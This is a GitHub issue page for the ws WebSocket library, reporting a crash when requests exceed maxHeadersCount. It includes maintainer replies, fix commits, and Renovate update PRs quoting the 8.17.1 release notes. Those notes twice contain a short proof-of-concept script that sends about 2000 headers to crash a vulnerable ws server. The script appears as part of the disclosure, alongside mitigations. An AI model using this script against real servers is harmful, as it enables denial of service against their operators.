Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Throws TypeError when there are too many HTTP headers #2230

Closed
1 task done
rrlapointe opened this issue Jun 15, 2024 · 4 comments · Fixed by #2231
Closed
1 task done

Throws TypeError when there are too many HTTP headers #2230

rrlapointe opened this issue Jun 15, 2024 · 4 comments · Fixed by #2231

Comments

@rrlapointe
Copy link

Is there an existing issue for this?

  • I've searched for any related issues and avoided creating a duplicate issue.

Description

I use this package for a websocket server. In the process of changing some options to try to make my websocket server slightly more resistant to DoS, I lowered the maxHeadersCount field on the HTTP server from its default of 2000 to a lower value. I then tested to see whether the server would reject requests with too many headers. Instead, the server crashed due to a TypeError from websocket-server.js line 246. This seems like a DoS issue.

I found this similar issue: #1838

ws version

8.17.0

Node.js Version

v21.5.0

System

OS: Debian GNU/Linux 12 (bookworm)
CPU: x64 Intel Core i5 CPU
Memory: 2.62 GB / 6.58 GB
Container: Yes
Shell: /bin/bash

Expected result

I expected the websocket server to refuse the handshake. Maybe respond with a 400 Bad Request. I did not expect my server app to crash from a TypeError.

Actual result

webpack://somewhere/node_modules/ws/lib/websocket-server.js:246
    if (req.headers.upgrade.toLowerCase() !== 'websocket') {
                            ^


TypeError: Cannot read properties of undefined (reading 'toLowerCase')
    at handleUpgrade (webpack://somewhere/node_modules/ws/lib/websocket-server.js:246:29)
    at Server.upgrade (webpack://somewhere/node_modules/ws/lib/websocket-server.js:119:16)
    at Server.emit (node:events:519:28)
    at onParserExecuteCommon (node:_http_server:942:14)
    at onParserExecute (node:_http_server:836:3)

Node.js v21.5.0

Attachments

No response

@lpinca
Copy link
Member

lpinca commented Jun 15, 2024

Please create a minimal reproducible test case using only ws. As per #1838 (comment), #1838 (comment) and #1838 (comment) it cannot happen unless ws is incorrectly used.

If the server 'upgrade' event is emitted without the Upgrade header then the bug is in Node.js core.

@lpinca
Copy link
Member

lpinca commented Jun 15, 2024

Here is a test case to reproduce the issue using only Node.js core modules.

const http = require('http');

const server = http.createServer();

server.maxHeadersCount = 1;

server.on('upgrade', function (request) {
  console.log(request.headers);
});

server.listen(function () {
  const { port } = server.address();
  const request = http.request({
    headers: {
      foo: 'foo',
      bar: 'bar',
      baz: 'baz',
      qux: 'qux',
      connection: 'Upgrade',
      upgrade: 'protocol'
    },
    host: '127.0.0.1',
    port
  });

  request.end();
});

The 'upgrade' event is emitted even if server.maxHeadersCount is set to 1. It seems that setting the property does not abort the request. If it is the expected behavior, I wonder what is the purpose of setting that limit.

lpinca added a commit that referenced this issue Jun 15, 2024
If the number of headers exceed the `maxHeadersCount` threshold,
`incomingMessage.headers.upgrade` can be `undefined`. Handle the case
correctly and abort the handshake.

Fixes #2230
@lpinca
Copy link
Member

lpinca commented Jun 15, 2024

See #2231.

lpinca added a commit that referenced this issue Jun 16, 2024
It is possible that the Upgrade header is correctly received and handled
(the `'upgrade'` event is emitted) without its value being returned to
the user. This can happen if the number of received headers exceed the
`server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this
case `incomingMessage.headers.upgrade` may not be set.

Handle the case correctly and abort the handshake.

Fixes #2230
@lpinca lpinca closed this as completed in fac8994 Jun 16, 2024
lpinca added a commit that referenced this issue Jun 16, 2024
It is possible that the Upgrade header is correctly received and handled
(the `'upgrade'` event is emitted) without its value being returned to
the user. This can happen if the number of received headers exceed the
`server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this
case `incomingMessage.headers.upgrade` may not be set.

Handle the case correctly and abort the handshake.

Fixes #2230
lpinca added a commit that referenced this issue Jun 16, 2024
It is possible that the Upgrade header is correctly received and handled
(the `'upgrade'` event is emitted) without its value being returned to
the user. This can happen if the number of received headers exceed the
`server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this
case `incomingMessage.headers.upgrade` may not be set.

Handle the case correctly and abort the handshake.

Fixes #2230
lpinca added a commit that referenced this issue Jun 16, 2024
It is possible that the Upgrade header is correctly received and handled
(the `'upgrade'` event is emitted) without its value being returned to
the user. This can happen if the number of received headers exceed the
`server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this
case `incomingMessage.headers.upgrade` may not be set.

Handle the case correctly and abort the handshake.

Fixes #2230
lpinca added a commit that referenced this issue Jun 16, 2024
It is possible that the Upgrade header is correctly received and handled
(the `'upgrade'` event is emitted) without its value being returned to
the user. This can happen if the number of received headers exceed the
`server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this
case `incomingMessage.headers.upgrade` may not be set.

Handle the case correctly and abort the handshake.

Fixes #2230
lpinca added a commit that referenced this issue Jun 16, 2024
It is possible that the Upgrade header is correctly received and handled
(the `'upgrade'` event is emitted) without its value being returned to
the user. This can happen if the number of received headers exceed the
`server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this
case `incomingMessage.headers.upgrade` may not be set.

Handle the case correctly and abort the handshake.

Fixes #2230
kodiakhq bot referenced this issue in X-oss-byte/Canary-nextjs Jun 17, 2024
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [ws](https://togithub.com/websockets/ws) | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.17.0/8.17.1) | [![age](https://developer.mend.io/api/mc/badges/age/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/ws/8.17.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ws/8.17.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

---

### Release Notes

<details>
<summary>websockets/ws (ws)</summary>

### [`v8.17.1`](https://togithub.com/websockets/ws/releases/tag/8.17.1)

[Compare Source](https://togithub.com/websockets/ws/compare/8.17.0...8.17.1)

### Bug fixes

-   Fixed a DoS vulnerability ([#&#8203;2231](https://togithub.com/websockets/ws/issues/2231)).

A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount]
threshold could be used to crash a ws server.

```js
const http = require('http');
const WebSocket = require('ws');

const server = http.createServer();

const wss = new WebSocket.Server({ server });

server.listen(function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: server.address().port
  });

  request.end();
});
```

The vulnerability was reported by [Ryan LaPointe](https://togithub.com/rrlapointe) in [https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230).

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1.  Reduce the maximum allowed length of the request headers using the
    [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so
    that no more headers than the `server.maxHeadersCount` limit can be sent.
2.  Set `server.maxHeadersCount` to `0` so that no limit is applied.

[`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize

[`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener

[`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

 - [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/X-oss-byte/Canary-nextjs).
kodiakhq bot referenced this issue in X-oss-byte/Nextjs Jun 17, 2024
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [ws](https://togithub.com/websockets/ws) | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.16.0/8.17.1) | [![age](https://developer.mend.io/api/mc/badges/age/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/ws/8.16.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ws/8.16.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) |

---

### Release Notes

<details>
<summary>websockets/ws (ws)</summary>

### [`v8.17.1`](https://togithub.com/websockets/ws/releases/tag/8.17.1)

[Compare Source](https://togithub.com/websockets/ws/compare/8.17.0...8.17.1)

### Bug fixes

-   Fixed a DoS vulnerability ([#&#8203;2231](https://togithub.com/websockets/ws/issues/2231)).

A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount]
threshold could be used to crash a ws server.

```js
const http = require('http');
const WebSocket = require('ws');

const server = http.createServer();

const wss = new WebSocket.Server({ server });

server.listen(function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: server.address().port
  });

  request.end();
});
```

The vulnerability was reported by [Ryan LaPointe](https://togithub.com/rrlapointe) in [https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230).

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1.  Reduce the maximum allowed length of the request headers using the
    [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so
    that no more headers than the `server.maxHeadersCount` limit can be sent.
2.  Set `server.maxHeadersCount` to `0` so that no limit is applied.

[`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize

[`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener

[`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount

### [`v8.17.0`](https://togithub.com/websockets/ws/releases/tag/8.17.0)

[Compare Source](https://togithub.com/websockets/ws/compare/8.16.0...8.17.0)

### Features

-   The `WebSocket` constructor now accepts the `createConnection` option ([#&#8203;2219](https://togithub.com/websockets/ws/issues/2219)).

### Other notable changes

-   The default value of the `allowSynchronousEvents` option has been changed to
    `true` ([#&#8203;2221](https://togithub.com/websockets/ws/issues/2221)).

This is a breaking change in a patch release. The assumption is that the option
is not widely used.

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

 - [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/X-oss-byte/Nextjs).
kodiakhq bot referenced this issue in weareinreach/TransMascFutures Jun 18, 2024
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Type | Update | Change | OpenSSF |
|---|---|---|---|---|
| [@prisma/adapter-neon](https://togithub.com/prisma/prisma) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/adapter-neon)) | dependencies | patch | [`5.15.0` -> `5.15.1`](https://renovatebot.com/diffs/npm/@prisma%2fadapter-neon/5.15.0/5.15.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/prisma/prisma/badge)](https://securityscorecards.dev/viewer/?uri=github.com/prisma/prisma) |
| [@prisma/client](https://www.prisma.io) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/client)) | dependencies | patch | [`5.15.0` -> `5.15.1`](https://renovatebot.com/diffs/npm/@prisma%2fclient/5.15.0/5.15.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/prisma/prisma/badge)](https://securityscorecards.dev/viewer/?uri=github.com/prisma/prisma) |
| [@storybook/addon-a11y](https://togithub.com/storybookjs/storybook/tree/next/code/addons/a11y) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/a11y)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-a11y/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@storybook/addon-essentials](https://togithub.com/storybookjs/storybook/tree/next/code/addons/essentials) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/essentials)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-essentials/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@storybook/addon-interactions](https://togithub.com/storybookjs/storybook/tree/next/code/addons/interactions) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/interactions)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-interactions/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@storybook/addon-links](https://togithub.com/storybookjs/storybook/tree/next/code/addons/links) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/links)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-links/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@storybook/addon-viewport](https://togithub.com/storybookjs/storybook/tree/next/code/addons/viewport) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/viewport)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-viewport/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@storybook/blocks](https://togithub.com/storybookjs/storybook/tree/next/code/ui/blocks) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/ui/blocks)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2fblocks/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@storybook/nextjs](https://togithub.com/storybookjs/storybook/tree/next/code/frameworks/nextjs) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/frameworks/nextjs)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2fnextjs/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@storybook/react](https://togithub.com/storybookjs/storybook/tree/next/code/renderers/react) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/renderers/react)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2freact/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@storybook/test](https://togithub.com/storybookjs/storybook/tree/next/code/lib/test) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/lib/test)) | dependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2ftest/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@types/node](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node) ([source](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node)) | devDependencies | patch | [`20.14.2` -> `20.14.5`](https://renovatebot.com/diffs/npm/@types%2fnode/20.14.2/20.14.5) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/DefinitelyTyped/DefinitelyTyped/badge)](https://securityscorecards.dev/viewer/?uri=github.com/DefinitelyTyped/DefinitelyTyped) |
| [@typescript-eslint/eslint-plugin](https://typescript-eslint.io/packages/eslint-plugin) ([source](https://togithub.com/typescript-eslint/typescript-eslint/tree/HEAD/packages/eslint-plugin)) | devDependencies | patch | [`7.13.0` -> `7.13.1`](https://renovatebot.com/diffs/npm/@typescript-eslint%2feslint-plugin/7.13.0/7.13.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/typescript-eslint/typescript-eslint/badge)](https://securityscorecards.dev/viewer/?uri=github.com/typescript-eslint/typescript-eslint) |
| [@typescript-eslint/parser](https://typescript-eslint.io/packages/parser) ([source](https://togithub.com/typescript-eslint/typescript-eslint/tree/HEAD/packages/parser)) | devDependencies | patch | [`7.13.0` -> `7.13.1`](https://renovatebot.com/diffs/npm/@typescript-eslint%2fparser/7.13.0/7.13.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/typescript-eslint/typescript-eslint/badge)](https://securityscorecards.dev/viewer/?uri=github.com/typescript-eslint/typescript-eslint) |
| [knip](https://knip.dev) ([source](https://togithub.com/webpro-nl/knip/tree/HEAD/packages/knip)) | devDependencies | minor | [`5.19.0` -> `5.21.2`](https://renovatebot.com/diffs/npm/knip/5.19.0/5.21.2) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/webpro-nl/knip/badge)](https://securityscorecards.dev/viewer/?uri=github.com/webpro-nl/knip) |
| [nextjs-routes](https://togithub.com/tatethurston/nextjs-routes) | dependencies | patch | [`2.2.0` -> `2.2.1`](https://renovatebot.com/diffs/npm/nextjs-routes/2.2.0/2.2.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/tatethurston/nextjs-routes/badge)](https://securityscorecards.dev/viewer/?uri=github.com/tatethurston/nextjs-routes) |
| [pnpm](https://pnpm.io) ([source](https://togithub.com/pnpm/pnpm)) | packageManager | minor | [`9.3.0` -> `9.4.0`](https://renovatebot.com/diffs/npm/pnpm/9.3.0/9.4.0) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/pnpm/pnpm/badge)](https://securityscorecards.dev/viewer/?uri=github.com/pnpm/pnpm) |
| [prisma](https://www.prisma.io) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/cli)) | devDependencies | patch | [`5.15.0` -> `5.15.1`](https://renovatebot.com/diffs/npm/prisma/5.15.0/5.15.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/prisma/prisma/badge)](https://securityscorecards.dev/viewer/?uri=github.com/prisma/prisma) |
| [storybook](https://togithub.com/storybookjs/storybook/tree/next/code/lib/cli) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/lib/cli)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/storybook/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [tsx](https://tsx.is) ([source](https://togithub.com/privatenumber/tsx)) | devDependencies | patch | [`4.15.4` -> `4.15.6`](https://renovatebot.com/diffs/npm/tsx/4.15.4/4.15.6) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/privatenumber/tsx/badge)](https://securityscorecards.dev/viewer/?uri=github.com/privatenumber/tsx) |
| [type-fest](https://togithub.com/sindresorhus/type-fest) | devDependencies | patch | [`4.20.0` -> `4.20.1`](https://renovatebot.com/diffs/npm/type-fest/4.20.0/4.20.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/sindresorhus/type-fest/badge)](https://securityscorecards.dev/viewer/?uri=github.com/sindresorhus/type-fest) |
| [ws](https://togithub.com/websockets/ws) | dependencies | patch | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.17.0/8.17.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/websockets/ws/badge)](https://securityscorecards.dev/viewer/?uri=github.com/websockets/ws) |

---

### Release Notes

<details>
<summary>prisma/prisma (@&#8203;prisma/adapter-neon)</summary>

### [`v5.15.1`](https://togithub.com/prisma/prisma/releases/tag/5.15.1)

[Compare Source](https://togithub.com/prisma/prisma/compare/5.15.0...5.15.1)

Today, we are issuing the `5.15.1` patch release.

#### Fixes in Prisma Client

-   [internal error: entered unreachable code](https://togithub.com/prisma/prisma/issues/23407)
-   [Got error 'internal error: entered unreachable code' when trying to perform an upsert.](https://togithub.com/prisma/prisma/issues/22947)
-   [Prisma Client errors on SQLite with internal error: entered unreachable code when running 2 concurrent upsert ](https://togithub.com/prisma/prisma/issues/22725)
-   [`ConnectionError(Timed out during query execution.)` during seeding](https://togithub.com/prisma/prisma/issues/21772)
-   [SQLite timeouts after upgrade from prisma 2 to prisma 4](https://togithub.com/prisma/prisma/issues/17029)
-   [`ConnectionError(Timed out during query execution.)` error when using `Promise.all` for SQLite](https://togithub.com/prisma/prisma/issues/11789)
-   [Improve the error when SQLite database file is locked](https://togithub.com/prisma/prisma/issues/10403)
-   [sqlite timeout error multiple queries run one after another](https://togithub.com/prisma/prisma/issues/10306)
-   [SQLite times out during query execution when using `Promise.all()` / concurrent](https://togithub.com/prisma/prisma/issues/9562)
-   [internal error: entered unreachable code](https://togithub.com/prisma/prisma/issues/24511)

</details>

<details>
<summary>storybookjs/storybook (@&#8203;storybook/addon-a11y)</summary>

### [`v8.1.10`](https://togithub.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#8110)

[Compare Source](https://togithub.com/storybookjs/storybook/compare/v8.1.9...v8.1.10)

-   Addon-interactions: Fix deprecation warnings - [#&#8203;28250](https://togithub.com/storybookjs/storybook/pull/28250), thanks [@&#8203;shilman](https://togithub.com/shilman)!
-   Test: Upgrade deps of [@&#8203;storybook/test](https://togithub.com/storybook/test) - [#&#8203;27862](https://togithub.com/storybookjs/storybook/pull/27862), thanks [@&#8203;kasperpeulen](https://togithub.com/kasperpeulen)!

</details>

<details>
<summary>typescript-eslint/typescript-eslint (@&#8203;typescript-eslint/eslint-plugin)</summary>

### [`v7.13.1`](https://togithub.com/typescript-eslint/typescript-eslint/blob/HEAD/packages/eslint-plugin/CHANGELOG.md#7131-2024-06-17)

[Compare Source](https://togithub.com/typescript-eslint/typescript-eslint/compare/v7.13.0...v7.13.1)

##### 🩹 Fixes

-   **eslint-plugin:** \[prefer-readonly] refine report locations

-   **eslint-plugin:** \[return-await] support explicit resource management

-   **eslint-plugin:** \[no-unsafe-member-access] differentiate a types-error any from a true any

##### ❤️  Thank You

-   Kirk Waiblinger
-   Yukihiro Hasegawa

You can read about our [versioning strategy](https://main--typescript-eslint.netlify.app/users/versioning) and [releases](https://main--typescript-eslint.netlify.app/users/releases) on our website.

</details>

<details>
<summary>typescript-eslint/typescript-eslint (@&#8203;typescript-eslint/parser)</summary>

### [`v7.13.1`](https://togithub.com/typescript-eslint/typescript-eslint/blob/HEAD/packages/parser/CHANGELOG.md#7131-2024-06-17)

[Compare Source](https://togithub.com/typescript-eslint/typescript-eslint/compare/v7.13.0...v7.13.1)

This was a version bump only for parser to align it with other projects, there were no code changes.

You can read about our [versioning strategy](https://main--typescript-eslint.netlify.app/users/versioning) and [releases](https://main--typescript-eslint.netlify.app/users/releases) on our website.

</details>

<details>
<summary>webpro-nl/knip (knip)</summary>

### [`v5.21.2`](https://togithub.com/webpro-nl/knip/compare/5.21.1...bd77bcce5acfdd108ab54398c922eb03f07fc65f)

[Compare Source](https://togithub.com/webpro-nl/knip/compare/5.21.1...5.21.2)

### [`v5.21.1`](https://togithub.com/webpro-nl/knip/releases/tag/5.21.1)

[Compare Source](https://togithub.com/webpro-nl/knip/compare/5.21.0...5.21.1)

-   Fix lockfile-lint config filename ([#&#8203;683](https://togithub.com/webpro-nl/knip/issues/683)) ([`f5304b6`](https://togithub.com/webpro-nl/knip/commit/f5304b6d))
-   feat: add command to ignored binaries ([#&#8203;682](https://togithub.com/webpro-nl/knip/issues/682)) ([`d049b6c`](https://togithub.com/webpro-nl/knip/commit/d049b6c4))
-   Add (custom) og img for sponsors page ([`d89ec12`](https://togithub.com/webpro-nl/knip/commit/d89ec129))
-   Rename `NOT_FOUND` to `KNIP_ADDED` workspace names ([`3a41f8e`](https://togithub.com/webpro-nl/knip/commit/3a41f8ec))

### [`v5.21.0`](https://togithub.com/webpro-nl/knip/releases/tag/5.21.0)

[Compare Source](https://togithub.com/webpro-nl/knip/compare/5.20.0...5.21.0)

-   Add webdriver-io plugin ([`7414dc1`](https://togithub.com/webpro-nl/knip/commit/7414dc1a))
-   Update plugin docs ([`df35b9f`](https://togithub.com/webpro-nl/knip/commit/df35b9f4))
-   Minor housekeeping ([`1422c9d`](https://togithub.com/webpro-nl/knip/commit/1422c9d2))
-   Add size-limit plugin ([`dbd82f8`](https://togithub.com/webpro-nl/knip/commit/dbd82f87))
-   Add lockfile-lint plugin ([`d70d0de`](https://togithub.com/webpro-nl/knip/commit/d70d0de7))
-   Use provided name in plugin template ([`43961f9`](https://togithub.com/webpro-nl/knip/commit/43961f91))
-   Minor housekeeping ([`c81b1a2`](https://togithub.com/webpro-nl/knip/commit/c81b1a23))
-   Update readme with badges and stuff ([`c18fcba`](https://togithub.com/webpro-nl/knip/commit/c18fcba5))
-   Update docs (Configuring Project Files) ([`e10ac2e`](https://togithub.com/webpro-nl/knip/commit/e10ac2e4))

### [`v5.20.0`](https://togithub.com/webpro-nl/knip/releases/tag/5.20.0)

[Compare Source](https://togithub.com/webpro-nl/knip/compare/5.19.0...5.20.0)

-   Lockfile ([`e929847`](https://togithub.com/webpro-nl/knip/commit/e9298477))
-   Edit doc ([`5afaac4`](https://togithub.com/webpro-nl/knip/commit/5afaac44))
-   More consistent usage of fg ([`25cbba0`](https://togithub.com/webpro-nl/knip/commit/25cbba0a))
-   Eliminiate custom TS System instance ([#&#8203;680](https://togithub.com/webpro-nl/knip/issues/680)) ([`d7325c6`](https://togithub.com/webpro-nl/knip/commit/d7325c69))
-   Go against the grain in the cypress plugin ([`ef2464d`](https://togithub.com/webpro-nl/knip/commit/ef2464d5))
-   Remove duplicate code ([`6a17ad2`](https://togithub.com/webpro-nl/knip/commit/6a17ad29))
-   Add simple-git-hooks plugin ([#&#8203;679](https://togithub.com/webpro-nl/knip/issues/679)) ([`9129af7`](https://togithub.com/webpro-nl/knip/commit/9129af70))
-   Add missing `root` property to vitest ([#&#8203;677](https://togithub.com/webpro-nl/knip/issues/677)) ([`6797bf8`](https://togithub.com/webpro-nl/knip/commit/6797bf8d))
-   Update some dependencies ([`7c9b645`](https://togithub.com/webpro-nl/knip/commit/7c9b6455))
-   Update docs ([`1c9361f`](https://togithub.com/webpro-nl/knip/commit/1c9361f3))
-   Make TS-style path mappings work for all files with extensions ([#&#8203;673](https://togithub.com/webpro-nl/knip/issues/673)) ([`e9b3e66`](https://togithub.com/webpro-nl/knip/commit/e9b3e669))

</details>

<details>
<summary>tatethurston/nextjs-routes (nextjs-routes)</summary>

### [`v2.2.1`](https://togithub.com/tatethurston/nextjs-routes/blob/HEAD/CHANGELOG.md#221)

[Compare Source](https://togithub.com/tatethurston/nextjs-routes/compare/v2.2.0...v2.2.1)

-   Fix route generation on Windows. See [#&#8203;187](https://togithub.com/tatethurston/nextjs-routes/issues/187). Thanks [@&#8203;AkanoCA](https://togithub.com/AkanoCA)!

</details>

<details>
<summary>pnpm/pnpm (pnpm)</summary>

